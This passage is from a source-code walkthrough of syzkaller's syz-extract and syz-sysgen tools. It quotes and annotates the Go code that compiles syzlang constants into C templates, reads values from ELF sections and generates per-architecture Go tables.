    // Note: syz-sysgen also ignores this file for arm and riscv64.
    return nil, nil, nil
}

It then builds the gcc arguments used to compile the source template:

// Kiprey: in function processFile of sys/syz-extract/linux.go
headerArch := arch.target.KernelHeaderArch
sourceDir := arch.sourceDir
buildDir := arch.buildDir
args := []string{
    // This makes the build completely hermetic, only kernel headers are used.
    "-nostdinc",
    "-w", "-fmessage-length=0",
    "-O3", // required to get expected values for some __builtin_constant_p
    "-I.",
    "-D__KERNEL__",
    "-DKBUILD_MODNAME=\"-\"",
    "-I" + sourceDir + "/arch/" + headerArch + "/include",
    "-I" + buildDir + "/arch/" + headerArch + "/include/generated/uapi",
    "-I" + buildDir + "/arch/" + headerArch + "/include/generated",
    "-I" + sourceDir + "/arch/" + headerArch + "/include/asm/mach-malta",
    "-I" + sourceDir + "/arch/" + headerArch + "/include/asm/mach-generic",
    "-I" + buildDir + "/include",
    "-I" + sourceDir + "/include",
    "-I" + sourceDir + "/arch/" + headerArch + "/include/uapi",
    "-I" + buildDir + "/arch/" + headerArch + "/include/generated/uapi",
    "-I" + sourceDir + "/include/uapi",
    "-I" + buildDir + "/include/generated/uapi",
    "-I" + sourceDir,
    "-I" + sourceDir + "/include/linux",
    "-I" + buildDir + "/syzkaller",
    "-include", sourceDir + "/include/linux/kconfig.h",
}
args = append(args, arch.target.CFlags...)
for _, incdir := range info.Incdirs {
    args = append(args, "-I"+sourceDir+"/"+incdir)
}
if arch.includeDirs != "" {
    for _, dir := range strings.Split(arch.includeDirs, ",") {
        args = append(args, "-I"+dir)
    }
}

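That is quite a lot of arguments.

With the arguments ready, processFile also sets up the extract parameters and the C compiler to use, then calls the more central extract function, which produces the res map and the undeclared set: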

// Kiprey: in function processFile of sys/syz-extract/linux.go
params := &extractParams{
    AddSource:      "#include <asm/unistd.h>",
    ExtractFromELF: true,
    TargetEndian:   arch.target.HostEndian,
}
cc := arch.target.CCompiler
res, undeclared, err := extract(info, cc, args, params)
if err != nil {
    return nil, nil, err
}

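Here, res maps const names to integers, and undeclared maps the names of undeclared consts to bool values, which are normally all true.

Constants listed in undeclared are written to the .const file with the value ???
For example:
O_RDWR = 2
MyConst = ???

After extract returns, if the current architecture is 32-bit, syz-extract replaces the value of __NR_mmap with that of __NR_mmap2 to avoid a syscall signature mismatch: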

if arch.target.PtrSize == 4 {
    // mmap syscall on i386/arm is translated to old_mmap and has different signature.
    // As a workaround fix it up to mmap2, which has signature that we expect.
    // pkg/csource has the same hack.
    const mmap = "__NR_mmap"
    const mmap2 = "__NR_mmap2"
    if res[mmap] != 0 || undeclared[mmap] {
        if res[mmap2] == 0 {
            return nil, nil, fmt.Errorf("%v is missing", mmap2)
        }
        res[mmap] = res[mmap2]
        delete(undeclared, mmap)
    }
}

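After the fix-up the results are returned:

return res, undeclared, nil

That concludes the walkthrough of extractor.processFile. Next, let's dig into extract.

7. extract

The code is located in sys/syz-extract/fetch.go.

This function invokes the compiler on the source template and obtains the integer values of the consts from the resulting binary. If compilation fails, it tries to recover automatically.

Function declaration:

func extract(info *compiler.ConstInfo, cc string, args []string, params *extractParams) (map[string]uint64, map[string]bool, error)

Here info is the structure holding the const data of a single file, cc is the name of the compiler, args are the compiler arguments, and params holds the options used while extract runs.

At the start, extract sets up its working state: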

// Kiprey: in function `extract`
data := &CompileData{
    extractParams: params,
    Defines:       info.Defines,
    Includes:      info.Includes,
    Values:        info.Consts,
}
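// Path of the compiled binary
bin := ""
// This map appears to serve no purpose here, so we ignore it for now
missingIncludes := make(map[string]bool)
// Undeclared consts, typically constants you defined yourself
undeclared := make(map[string]bool)
// Create valMap and mark every const as true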
valMap := make(map[string]bool)
for _, val := range info.Consts {
    valMap[val] = true
}

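Next, the const names are combined with the C source template and the result is compiled into a binary. The compile function does this and returns the path of the compiled file, the compiler's combined stdout and stderr output (only on failure), and an error: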

// Kiprey: in function `extract`
for {
    bin1, out, err := compile(cc, args, data)
    if err == nil {
        bin = bin1
        break
    }
    ...
}

Let's first step into compile. It is very simple, so the notes are inlined in the code:

func compile(cc string, args []string, data *CompileData) (string, []byte, error) {
    // Buffer that will hold the filled-in C source
    src := new(bytes.Buffer)
    // Fill in the source template srcTemplate with the given data
    if err := srcTemplate.Execute(src, data); err != nil {
        return "", nil, fmt.Errorf("failed to generate source: %v", err)
    }
    // Create a temporary path for the output binary
    binFile, err := osutil.TempFile("syz-extract-bin")
    if err != nil {
        return "", nil, err
    }
    // Append extra compiler arguments
    args = append(args, []string{
        // -x c: treat the input as C
        // -: read the source from standard input instead of a file
        "-x", "c", "-",
        // Output file path
        "-o", binFile,
        "-w",
    }...)
    if data.ExtractFromELF {
        // gcc -c: compile only, do not link
        // We are testing on Linux, so this branch is taken
        args = append(args, "-c")
    }
    // Prepare the compiler command
    cmd := osutil.Command(cc, args...)
    // Feed the filled-in source template to gcc on stdin
    cmd.Stdin = src
    // CombinedOutput runs the command and returns its stdout and stderr
    // merged into a single byte slice
    if out, err := cmd.CombinedOutput(); err != nil {
        os.Remove(binFile)
        return "", out, err
    }
    return binFile, nil, nil
}

When execution reaches the entry of this function, its arguments look like this:

Now let's look at the source template itself:

var srcTemplate = template.Must(template.New("").Parse(`
{{if not .ExtractFromELF}}
#define __asm__(...)
{{end}}

{{if .DefineGlibcUse}}
#ifndef __GLIBC_USE
#    define __GLIBC_USE(X) 0
#endif
{{end}}

{{range $incl := $.Includes}}
#include <{{$incl}}>
{{end}}

{{range $name, $val := $.Defines}}
#ifndef {{$name}}
#    define {{$name}} {{$val}}
#endif
{{end}}

{{.AddSource}}

{{if .DeclarePrintf}}
int printf(const char *format, ...);
{{end}}

{{if .ExtractFromELF}}
__attribute__((section("syz_extract_data")))
unsigned long long vals[] = {
    {{range $val := $.Values}}(unsigned long long){{$val}},
    {{end}}
};
{{else}}
int main() {
    int i;
    unsigned long long vals[] = {
        {{range $val := $.Values}}(unsigned long long){{$val}},
        {{end}}
    };
    for (i = 0; i < sizeof(vals)/sizeof(vals[0]); i++) {
        if (i != 0)
            printf(" ");
        printf("%llu", vals[i]);
    }
    return 0;
}
{{end}}
`))

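It is easy to see that the template merges all the include, define, and const strings collected earlier from syzlang:

If ExtractFromELF is set, all const values are placed in a section named syz_extract_data.
If it is not set, the compiled program prints the const values one by one to stdout when run, formatted with %llu and separated by spaces. syz-extract can then parse the program's output to determine the numeric value of each const.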
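
To see what the range part of such a template produces, here is a stripped-down sketch using Go's text/template. The valsTemplate variable, the compileData type, and the render helper are assumptions for illustration and cover only the vals array, not the full srcTemplate.

```go
package main

import (
	"bytes"
	"fmt"
	"text/template"
)

// valsTemplate emits one array entry per constant name.
var valsTemplate = template.Must(template.New("vals").Parse(
	`unsigned long long vals[] = {
{{range $val := .Values}}    (unsigned long long){{$val}},
{{end}}};
`))

// compileData is a reduced, hypothetical version of the template input.
type compileData struct {
	Values []string
}

// render fills the template and returns the generated C source.
func render(values []string) (string, error) {
	var buf bytes.Buffer
	if err := valsTemplate.Execute(&buf, compileData{Values: values}); err != nil {
		return "", err
	}
	return buf.String(), nil
}

func main() {
	src, err := render([]string{"O_RDWR", "O_CREAT"})
	if err != nil {
		panic(err)
	}
	fmt.Print(src)
}
```

The constant names are pasted into the C source verbatim, so it is the C compiler, not Go, that resolves them to numbers.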

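Back in extract. Some consts and syscall numbers are not defined on every arch, and syzlang descriptions are easy to get wrong, so syz-extract tries to recover from compile errors automatically: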

// Kiprey: in function `extract`
for {
    bin1, out, err := compile(cc, args, data)
    if err == nil {
        bin = bin1
        break
    }
    // Some consts and syscall numbers are not defined on some archs.
    // Figure out from compiler output undefined consts,
    // and try to compile again without them.
    // May need to try multiple times because some severe errors terminate compilation.
    tryAgain := false
    // Match every predefined error pattern against the compiler output using regular expressions
    for _, errMsg := range []string{
        `error: [‘']([a-zA-Z0-9_]+)[’'] undeclared`,
        `note: in expansion of macro [‘']([a-zA-Z0-9_]+)[’']`,
        `note: expanded from macro [‘']([a-zA-Z0-9_]+)[’']`,
        `error: use of undeclared identifier [‘']([a-zA-Z0-9_]+)[’']`,
    } {
        re := regexp.MustCompile(errMsg)
        matches := re.FindAllSubmatch(out, -1)
        // On a match, record the offending const in undeclared
        for _, match := range matches {
            val := string(match[1])
            if valMap[val] && !undeclared[val] {
                undeclared[val] = true
                tryAgain = true
            }
        }
    }
    if !tryAgain {
        return nil, nil, fmt.Errorf("failed to run compiler: %v %v\n%v\n%s",
                                    cc, args, err, out)
    }
    // Reset the list of consts to compile
    data.Values = nil
    // Drop the failing consts and keep the rest for the next compile
    for _, v := range info.Consts {
        if undeclared[v] {
            continue
        }
        data.Values = append(data.Values, v)
    }
    // The purpose of this part is unclear to me: it rebuilds data.Includes, but nothing is ever filtered out
    data.Includes = nil
    for _, v := range info.Includes {
        // missingIncludes is never populated, so it always stays empty
        if missingIncludes[v] {
            continue
        }
        data.Includes = append(data.Includes, v)
    }
}
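
To make the retry logic above more concrete, here is a minimal sketch of the matching step on its own. The function name undeclaredConsts and the sample compiler output are made up for illustration; only two of the four patterns are used, and this is not the syz-extract code itself.

```go
package main

import (
	"fmt"
	"regexp"
)

// undeclaredConsts scans compiler output for "undeclared" diagnostics and
// returns the reported names that are also present in known.
// (Hypothetical helper, written only for this illustration.)
func undeclaredConsts(out []byte, known map[string]bool) map[string]bool {
	patterns := []string{
		`error: [‘']([a-zA-Z0-9_]+)[’'] undeclared`,
		`error: use of undeclared identifier [‘']([a-zA-Z0-9_]+)[’']`,
	}
	found := make(map[string]bool)
	for _, p := range patterns {
		re := regexp.MustCompile(p)
		// Each match has the full text at index 0 and the captured name at index 1.
		for _, m := range re.FindAllSubmatch(out, -1) {
			name := string(m[1])
			if known[name] {
				found[name] = true
			}
		}
	}
	return found
}

func main() {
	// Made-up compiler output, in the style of gcc and clang diagnostics.
	out := []byte("a.c:3:5: error: 'FOO_BAR' undeclared (first use in this function)\n" +
		"a.c:4:5: error: use of undeclared identifier 'BAZ'\n")
	known := map[string]bool{"FOO_BAR": true, "BAZ": true, "OK_CONST": true}
	fmt.Println(undeclaredConsts(out, known))
}
```

Filtering by the known set matters: the diagnostics may also mention identifiers that are not consts from the description, and those must not trigger a retry.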

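After that, the values are read from the compiled binary, parsed, and returned:

Note: os.Remove is registered with defer, so the compiled binary is removed only when the function returns, that is, after the values have been read from it. Even if a file descriptor were still open at that point, on Linux an unlinked file is only reclaimed once the last descriptor referring to it is closed.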

// Delete the freshly compiled binary when the function returns
defer os.Remove(bin)

var flagVals []uint64
var err error
if data.ExtractFromELF {
    flagVals, err = extractFromELF(bin, params.TargetEndian)
} else {
    flagVals, err = extractFromExecutable(bin)
}
if err != nil {
    return nil, nil, err
}
if len(flagVals) != len(data.Values) {
    return nil, nil, fmt.Errorf("fetched wrong number of values %v, want != %v",
                                len(flagVals), len(data.Values))
}
res := make(map[string]uint64)
for i, name := range data.Values {
    res[name] = flagVals[i]
}
return res, undeclared, nil

The code that actually operates on the binary is just these few lines:

if data.ExtractFromELF {
    flagVals, err = extractFromELF(bin, params.TargetEndian)
} else {
    flagVals, err = extractFromExecutable(bin)
}

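If the ExtractFromELF field is false, syz-extract takes the else branch and calls extractFromExecutable. This function actually runs the compiled program, parses its output, and converts it into an integer array: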

func extractFromExecutable(binFile string) ([]uint64, error) {
    out, err := osutil.Command(binFile).CombinedOutput()
    if err != nil {
        return nil, fmt.Errorf("failed to run flags binary: %v\n%s", err, out)
    }
    if len(out) == 0 {
        return nil, nil
    }
    var vals []uint64
    for _, val := range strings.Split(string(out), " ") {
        n, err := strconv.ParseUint(val, 10, 64)
        if err != nil {
            return nil, fmt.Errorf("failed to parse value: %v (%v)", err, val)
        }
        vals = append(vals, n)
    }
    return vals, nil
}

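However, when the OS is Linux the ExtractFromELF flag is true, so extractFromELF is called instead. In this function syz-extract does not run the program at all; it reads the const values from the ELF section named syz_extract_data:

The file could not be executed anyway: linking was deliberately skipped earlier, and there is no main function.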

func extractFromELF(binFile string, targetEndian binary.ByteOrder) ([]uint64, error) {
    f, err := os.Open(binFile)
    if err != nil {
        return nil, err
    }
    ef, err := elf.NewFile(f)
    if err != nil {
        return nil, err
    }
    for _, sec := range ef.Sections {
        if sec.Name != "syz_extract_data" {
            continue
        }
        data, err := ioutil.ReadAll(sec.Open())
        if err != nil {
            return nil, err
        }
        vals := make([]uint64, len(data)/8)
        if err := binary.Read(bytes.NewReader(data), targetEndian, &vals); err != nil {
            return nil, err
        }
        return vals, nil
    }
    return nil, fmt.Errorf("did not find syz_extract_data section")
}

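The purpose seems to be faster const extraction, since reading a file is much cheaper than executing a program. Presumably it also avoids having to run a binary that was built for a different architecture.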

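8. Summary

syz-extract invokes its own compiler to parse syzlang into a forest of ASTs, collects the const nodes from each AST, places the const names into a C template, and compiles the template into an ELF object or another executable.

syz-extract then either reads the data from the ELF file or runs the executable and parses its output, obtaining the concrete integer value for each const name.

Finally, syz-extract serializes the mapping from const names to integer values into .const files, producing one .const file for each syzlang file.

Throughout this process syz-extract runs its workers in separate goroutines, so that consts can be extracted while earlier results are being written to files, which speeds up extraction.

The VS Code launch.json used for debugging: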

{
    "version": "0.2.0",
    "configurations": [
        {
            "name": "syzextractLaunch",
            "type": "go",
            "request": "launch",
            "mode": "auto",
            "program": "${fileDirname}",
            "env": {},
            "cwd": "/usr/class/syzkaller",
            "args": ["-sourcedir", "/usr/class/linux", "-arch", "amd64"] 
        }
    ]
}

三、syz-sysgen

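The code lives in sys/syz-sysgen/sysgen.go.

syz-sysgen parses the hand-written syzlang files and converts the syscall type information they define into data structures that the rest of syzkaller can use.

Once syz-extract is understood, the syz-sysgen code is comparatively easy to follow. Let's start from the main function.

1. main

First it collects the names of all supported OSes and creates the structure that will hold the results: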

// Kiprey：in Function main
defer tool.Init()()

var OSList []string
for OS := range targets.List {
    OSList = append(OSList, OS)
}
sort.Strings(OSList)

data := &ExecutorData{}

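The defer statement on the first line calls tool.Init() immediately and defers the function it returns, which then runs when main returns (deferred calls also run while a panic unwinds the function). tool.Init() deals with the CPU/memory profiling command-line flags, which is outside our scope, so we skip it.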
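
The double call in defer tool.Init()() is easy to misread, so here is a small sketch of the same pattern. The names setup and run are hypothetical; the point is only the order in which things happen.

```go
package main

import "fmt"

// setup does its initialization right away and returns a cleanup function.
// (Hypothetical stand-in for a function shaped like tool.Init.)
func setup(log *[]string) func() {
	*log = append(*log, "init")
	return func() { *log = append(*log, "cleanup") }
}

// run records the order in which the three steps execute.
func run() []string {
	var log []string
	func() {
		// setup(&log) is evaluated now; only the returned function is deferred.
		defer setup(&log)()
		log = append(log, "body")
	}()
	return log
}

func main() {
	fmt.Println(run()) // prints [init body cleanup]
}
```

In other words, the expression before the final pair of parentheses is evaluated at the defer statement, and only the last call is postponed.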

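After this code runs, the variables look as shown in the figure below:

Next comes a for loop that iterates over each OS name in OSList and processes the syzlang code for that OS. I split the loop body into three parts.

The first part: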

// Kiprey：in Function main
for _, OS := range OSList {
    descriptions := ast.ParseGlob(filepath.Join(*srcDir, "sys", OS, "*.txt"), nil)
    if descriptions == nil {
        os.Exit(1)
    }
    constFile := compiler.DeserializeConstFile(filepath.Join(*srcDir, "sys", OS, "*.const"), nil)
    if constFile == nil {
        os.Exit(1)
    }
    osutil.MkdirAll(filepath.Join(*outDir, "sys", OS, "gen"))

    var archs []string
    for arch := range targets.List[OS] {
        archs = append(archs, arch)
    }
    sort.Strings(archs)

    ...
}

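This part is simple: the sys//*.txt and sys//*.const files of the current OS are parsed into an AST (of type ast.Description) and a ConstFile structure, respectively. The sys//gen directory is then created; the Go files that syz-sysgen generates for this OS are stored there.

After that, the names of all archs supported by the current OS are collected and sorted.

The second part: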

// Kiprey：in Function main
for _, OS := range OSList {
    ...
    
    var jobs []*Job
    for _, arch := range archs {
        jobs = append(jobs, &Job{
            Target:      targets.List[OS][arch],
            Unsupported: make(map[string]bool),
        })
    }
    sort.Slice(jobs, func(i, j int) bool {
        return jobs[i].Target.Arch < jobs[j].Target.Arch
    })
    var wg sync.WaitGroup
    wg.Add(len(jobs))

    for _, job := range jobs {
        job := job
        go func() {
            defer wg.Done()
            processJob(job, descriptions, constFile)
        }()
    }
    wg.Wait()

    ...
}

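First a Job structure is created for every arch and appended to the jobs slice, which is then sorted with a custom comparison (by arch name).

Next a sync.WaitGroup is created, which is used to wait for a given number of goroutines to finish. It works somewhat like a semaphore: wg.Add increases the internal counter, wg.Done decreases it, and wg.Wait blocks until the counter reaches zero.

Most importantly, syz-sysgen walks the jobs slice and starts one goroutine per job so that they run in parallel. processJob compiles the previously parsed syzlang AST, analyzes the type information and dependencies, and serializes the result as Go code into sys//gen/.go. It also stores the syscall attribute information in job.ArchData, which is later used to generate the key header files of syz-executor.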
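
The fan-out and wait pattern described above can be reduced to a few lines. This is a generic sketch, not the syz-sysgen code: processAll and the work callback are hypothetical names, and each goroutine writes to its own slot of the result slice so that no extra locking is needed.

```go
package main

import (
	"fmt"
	"sync"
)

// processAll runs work on every item in its own goroutine and returns
// once all of them have finished.
func processAll(items []string, work func(string) int) []int {
	results := make([]int, len(items))
	var wg sync.WaitGroup
	wg.Add(len(items)) // one counter increment per goroutine
	for i, item := range items {
		i, item := i, item // per-iteration copies, as in "job := job" above
		go func() {
			defer wg.Done() // decrement even if work panics
			results[i] = work(item)
		}()
	}
	wg.Wait() // blocks until the counter is back to zero
	return results
}

func main() {
	lengths := processAll([]string{"386", "amd64", "arm64"}, func(s string) int {
		return len(s)
	})
	fmt.Println(lengths)
}
```

Calling wg.Add once before starting the goroutines, as main does, avoids a race in which wg.Wait could observe a zero counter before any goroutine has been registered.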

Finally, the third part:

// Kiprey：in Function main
for _, OS := range OSList {
    ...
    
    var syscallArchs []ArchData
    unsupported := make(map[string]int)
    for _, job := range jobs {
        if !job.OK {
            fmt.Printf("compilation of %v/%v target failed:\n", job.Target.OS, job.Target.Arch)
            for _, msg := range job.Errors {
                fmt.Print(msg)
            }
            os.Exit(1)
        }
        syscallArchs = append(syscallArchs, job.ArchData)
        for u := range job.Unsupported {
            unsupported[u]++
        }
    }
    data.OSes = append(data.OSes, OSData{
        GOOS:  OS,
        Archs: syscallArchs,
    })

    for what, count := range unsupported {
        if count == len(jobs) {
            tool.Failf("%v is unsupported on all arches (typo?)", what)
        }
    }
}

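Nothing in the third part needs special attention: it performs some checks and collects the ArchData produced by each processJob goroutine into the variable data.

After the for loop finishes, the last part of main sets a few more fields of data: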

attrs := reflect.TypeOf(prog.SyscallAttrs{})
for i := 0; i < attrs.NumField(); i++ {
    data.CallAttrs = append(data.CallAttrs, prog.CppName(attrs.Field(i).Name))
}

props := prog.CallProps{}
props.ForeachProp(func(name, _ string, value reflect.Value) {
    data.CallProps = append(data.CallProps, CallPropDescription{
        Type: value.Kind().String(),
        Name: prog.CppName(name),
    })
})

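This code may look puzzling at first, but on closer inspection it simply records the field names of the two structures prog.SyscallAttrs and prog.CallProps (plus the field type for CallProps). The two structures are declared as follows: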

// SyscallAttrs represents call attributes in syzlang.
//
// This structure is the source of truth for the all other parts of the system.
// pkg/compiler uses this structure to parse descriptions.
// syz-sysgen uses this structure to generate code for executor.
//
// Only bool's and uint64's are currently supported.
//
// See docs/syscall_descriptions_syntax.md for description of individual attributes.
type SyscallAttrs struct {
    Disabled      bool
    Timeout       uint64
    ProgTimeout   uint64
    IgnoreReturn  bool
    BreaksReturns bool
}

// These properties are parsed and serialized according to the tag and the type
// of the corresponding fields.
// IMPORTANT: keep the exact values of "key" tag for existing props unchanged,
// otherwise the backwards compatibility would be broken.
type CallProps struct {
    FailNth int `key:"fail_nth"`
}

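What actually ends up in data is shown below:

From the source above, it appears that syz-sysgen converts the field names of prog.SyscallAttrs, together with the per-syscall data, into plain strings and integers. This looks like data meant to fill in a C template. The writeExecutorSyscalls function shows what is actually done with it.

The analysis of writeExecutorSyscalls appears in its own section below, so it is not repeated here.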

2. processJob

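The main job of processJob is to compile the given syzlang AST, analyze its syscall type information, and serialize the result as Go source code.

The job parameter passed to processJob has the following structure: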

type Job struct {
    Target      *targets.Target // constants describing one specific OS/arch pair
    OK          bool
    Errors      []string        // error messages, one string per line of output
    Unsupported map[string]bool // set of unsupported syscalls
    ArchData    ArchData        // data handed back from the worker goroutine to main
}

First, the function creates an error handler that collects error messages. It then fetches, from the ConstFile structure, the const name -> integer table for the job's arch:

// Kiprey: in function `processJob`
eh := func(pos ast.Pos, msg string) {
    job.Errors = append(job.Errors, fmt.Sprintf("%v: %v\n", pos, msg))
}
consts := constFile.Arch(job.Target.Arch)
top := descriptions

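Next, for the Linux architectures that need special handling, syz-sysgen installs a filter that drops every node coming from a file whose name ends in _kvm.txt, so those descriptions are not processed. The dropped entries are recorded in job.Unsupported, and later steps skip them: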

// Kiprey: in function `processJob`
if job.Target.OS == targets.Linux && (job.Target.Arch == targets.ARM || job.Target.Arch == targets.RiscV64) {
    // Hack: KVM is not supported on ARM anymore. On riscv64 it
    // is not supported yet but might be in the future.
    // Note: syz-extract also ignores this file for arm and riscv64.
    top = descriptions.Filter(func(n ast.Node) bool {
        pos, typ, name := n.Info()
        if !strings.HasSuffix(pos.File, "_kvm.txt") {
            return true
        }
        switch n.(type) {
        case *ast.Resource, *ast.Struct, *ast.Call, *ast.TypeDef:
            // Mimic what pkg/compiler would do with unsupported entries.
            // This is required to keep the unsupported diagnostic below working
            // for kvm entries, otherwise it will not think that kvm entries
            // are not supported on all architectures.
            job.Unsupported[typ+" "+name] = true
        }
        return false
    })
}

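Besides the filtered Linux architectures, there is one more special case: TestOS, which the syzkaller developers use for their own tests. For it, syz-sysgen extracts the consts and, as the function name suggests, fabricates the syscall constants: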

// Kiprey: in function `processJob`
if job.Target.OS == targets.TestOS {
    constInfo := compiler.ExtractConsts(top, job.Target, eh)
    compiler.FabricateSyscallConsts(job.Target, constInfo, consts)
}

The string behind targets.TestOS is test.

Next, syz-sysgen analyzes the AST and compiles the syzlang descriptions:

// Kiprey: in function `processJob`
prog := compiler.Compile(top, consts, job.Target, eh)
if prog == nil {
    return
}
for what := range prog.Unsupported {
    job.Unsupported[what] = true
}

The returned Prog structure is declared as follows:

// Kiprey: in function `processJob`
 
// Prog is description compilation result.
type Prog struct {
    Resources []*prog.ResourceDesc
    Syscalls  []*prog.Syscall
    Types     []prog.Type
    // Set of unsupported syscalls/flags.
    Unsupported map[string]bool
    // Returned if consts was nil.
    fileConsts map[string]*ConstInfo
}

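The compilation is similar to the one in syz-extract, except that this time the consts are supplied, so the full compilation runs and all syscall argument type information described in syzlang is analyzed. In the returned Prog structure:

The fileConsts field is empty.
The type information is stored in the Resources and Types fields.
The syscall descriptions are stored in the Syscalls field.

The results are then serialized as Go source code for later use by syz-fuzzer. The generated code is written to sys//gen/.go, for example sys/linux/gen/amd64.go (roughly 110,000 lines):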

// Kiprey: in function `processJob`
sysFile := filepath.Join(*outDir, "sys", job.Target.OS, "gen", job.Target.Arch+".go")
out := new(bytes.Buffer)
// generate serializes the compiled description as Go code
generate(job.Target, prog, consts, out)
rev := hash.String(out.Bytes())
fmt.Fprintf(out, "const revision_%v = %q\n", job.Target.Arch, rev)
writeSource(sysFile, out.Bytes())

Let's look at what the generated Go code looks like (taking /sys/linux/gen/amd64.go as an example):

// AUTOGENERATED FILE
// +build !codeanalysis
// +build !syz_target syz_target,syz_os_linux,syz_arch_amd64

package gen

import . "github.com/google/syzkaller/prog"
import . "github.com/google/syzkaller/sys/linux"

func init() {
    RegisterTarget(&Target{OS: "linux", Arch: "amd64", Revision: revision_amd64, PtrSize: 8, PageSize: 4096, NumPages: 4096, DataOffset: 536870912, LittleEndian: true, ExecutorUsesShmem: true, Syscalls: syscalls_amd64, Resources: resources_amd64, Consts: consts_amd64}, types_amd64, InitTarget)
}

var resources_amd64 = []*ResourceDesc{
{Name:"ANYRES16",Kind:[]string{"ANYRES16"},Values:[]uint64{18446744073709551615,0}},
{Name:"ANYRES32",Kind:[]string{"ANYRES32"},Values:[]uint64{18446744073709551615,0}},
{Name:"ANYRES64",Kind:[]string{"ANYRES64"},Values:[]uint64{18446744073709551615,0}},
{Name:"IMG_DEV_VIRTADDR",Kind:[]string{"IMG_DEV_VIRTADDR"},Values:[]uint64{0}},
{Name:"IMG_HANDLE",Kind:[]string{"IMG_HANDLE"},Values:[]uint64{0}},
{Name:"assoc_id",Kind:[]string{"assoc_id"},Values:[]uint64{0}},
....
}

var syscalls_amd64 = []*Syscall{
{NR:43,Name:"accept",CallName:"accept",Args:[]Field{
{Name:"fd",Type:Ref(11199)},
{Name:"peer",Type:Ref(10021)},
{Name:"peerlen",Type:Ref(10305)},
},Ret:Ref(11199)},
{NR:43,Name:"accept$alg",CallName:"accept",Args:[]Field{
{Name:"fd",Type:Ref(11202)},
{Name:"peer",Type:Ref(4943)},
{Name:"peerlen",Type:Ref(4943)},
},Ret:Ref(11203)},
{NR:43,Name:"accept$ax25",CallName:"accept",Args:[]Field{
{Name:"fd",Type:Ref(11204)},
{Name:"peer",Type:Ref(10033)},
{Name:"peerlen",Type:Ref(10305)},
},Ret:Ref(11204)},
{NR:43,Name:"accept$inet",CallName:"accept",Args:[]Field{
{Name:"fd",Type:Ref(11223)},
{Name:"peer",Type:Ref(10025)},
{Name:"peerlen",Type:Ref(10305)},
},Ret:Ref(11223)},
....
}

var types_amd64 = []Type{
&ArrayType{TypeCommon:TypeCommon{TypeName:"array",TypeAlign:1,IsVarlen:true},Elem:Ref(17155)},
&ArrayType{TypeCommon:TypeCommon{TypeName:"array",TypeAlign:1,IsVarlen:true},Elem:Ref(14707),Kind:1,RangeEnd:32},
&ArrayType{TypeCommon:TypeCommon{TypeName:"array",TypeAlign:1,IsVarlen:true},Elem:Ref(14707),Kind:1,RangeEnd:8},
&ArrayType{TypeCommon:TypeCommon{TypeName:"array",TypeAlign:1,IsVarlen:true},Elem:Ref(14560)},
&ArrayType{TypeCommon:TypeCommon{TypeName:"array",TypeAlign:1,IsVarlen:true},Elem:Ref(14575)},
....
}

var consts_amd64 = []ConstValue{
{"ABS_CNT",64},
{"ABS_MAX",63},
{"ACL_EXECUTE",1},
{"ACL_GROUP",8},
{"ACL_GROUP_OBJ",4},
{"ACL_LINK",1},
....
}

const revision_amd64 = "e61403f96ca19fc071d8e9c946b2259a2804c68e"

Here the init function registers the linux/amd64 target in the targets map so that syz-fuzzer can look it up later.

var targets = make(map[string]*Target)

func RegisterTarget(target *Target, types []Type, initArch func(target *Target)) {
    key := target.OS + "/" + target.Arch
    if targets[key] != nil {
        panic(fmt.Sprintf("duplicate target %v", key))
    }
    target.initArch = initArch
    target.types = types
    targets[key] = target
}

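amd64.go also declares several arrays:

resources_amd64: every resource declared in the syzlang descriptions.
syscalls_amd64: the name and number of every syscall, plus the name and type of each argument.
types_amd64: the details of every type, such as arrays and structures.
consts_amd64: the mapping from const names to integer values.
revision_amd64: a hash of the generated amd64.go source.

Back in processJob, the last step is to call generateExecutorSyscalls to build the syscall information for the executor and hand it back to the caller (main) through job.ArchData: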

// Kiprey: in function `processJob`
job.ArchData = generateExecutorSyscalls(job.Target, prog.Syscalls, rev)
  
// Don't print warnings, they are printed in syz-check.
job.Errors = nil
job.OK = true

This information is used to generate the C code of syz-executor.

3. generateExecutorSyscalls

As its name suggests, this function prepares the syscall data needed to generate syz-executor.

It starts by creating an ArchData structure, which is eventually passed back to main.

data := ArchData{
    Revision:   rev,
    GOARCH:     target.Arch,
    PageSize:   target.PageSize,
    NumPages:   target.NumPages,
    DataOffset: target.DataOffset,
}
if target.ExecutorUsesForkServer {
    data.ForkServer = 1
}
if target.ExecutorUsesShmem {
    data.Shmem = 1
}

If the target structure for this OS and arch enables ForkServer and Shmem (shared memory), the corresponding fields in data are set to 1, so syz-executor can use both techniques to speed up fuzzing.

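Next comes a for loop over the Syscall structures in the syscalls slice. It may look hard to read at first, but all it does is take each field of the SyscallAttrs structure in c.Attrs, convert it to uint64, and append it to attrVals. The slice is truncated after its last non-zero element and then used to build a SyscallData structure: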

for _, c := range syscalls {
    var attrVals []uint64
    attrs := reflect.ValueOf(c.Attrs)
    last := -1
    for i := 0; i < attrs.NumField(); i++ {
        attr := attrs.Field(i)
        val := uint64(0)
        switch attr.Type().Kind() {
        case reflect.Bool:
            if attr.Bool() {
                val = 1
            }
        case reflect.Uint64:
            val = attr.Uint()
        default:
            panic("unsupported syscall attribute type")
        }
        attrVals = append(attrVals, val)
        if val != 0 {
            last = i
        }
    }
    data.Calls = append(data.Calls, newSyscallData(target, c, attrVals[:last+1]))
}
sort.Slice(data.Calls, func(i, j int) bool {
    return data.Calls[i].Name < data.Calls[j].Name
})
return data
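
The flattening step can be reproduced outside syzkaller. In the sketch below, attrs is a hypothetical stand-in for prog.SyscallAttrs and flatten is a made-up helper name; the logic follows the loop above, including the trimming of trailing zeros.

```go
package main

import (
	"fmt"
	"reflect"
)

// attrs is a hypothetical stand-in for prog.SyscallAttrs.
type attrs struct {
	Disabled     bool
	Timeout      uint64
	ProgTimeout  uint64
	IgnoreReturn bool
}

// flatten converts every field of a struct value to uint64 (bools become
// 0 or 1) and drops the trailing zero values.
func flatten(a interface{}) []uint64 {
	v := reflect.ValueOf(a)
	var vals []uint64
	last := -1 // index of the last non-zero value seen so far
	for i := 0; i < v.NumField(); i++ {
		f := v.Field(i)
		var val uint64
		switch f.Kind() {
		case reflect.Bool:
			if f.Bool() {
				val = 1
			}
		case reflect.Uint64:
			val = f.Uint()
		default:
			panic("unsupported attribute type")
		}
		vals = append(vals, val)
		if val != 0 {
			last = i
		}
	}
	return vals[:last+1]
}

func main() {
	fmt.Println(flatten(attrs{}))                   // nothing set: empty slice
	fmt.Println(flatten(attrs{Timeout: 50}))        // trailing zeros removed
	fmt.Println(flatten(attrs{IgnoreReturn: true})) // leading zeros are kept
}
```

Only trailing zeros can be dropped, because the position of each value identifies the attribute it belongs to. A syscall whose attributes are all at their defaults ends up with an empty slice.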

Below is an example of the information stored in the data variable:

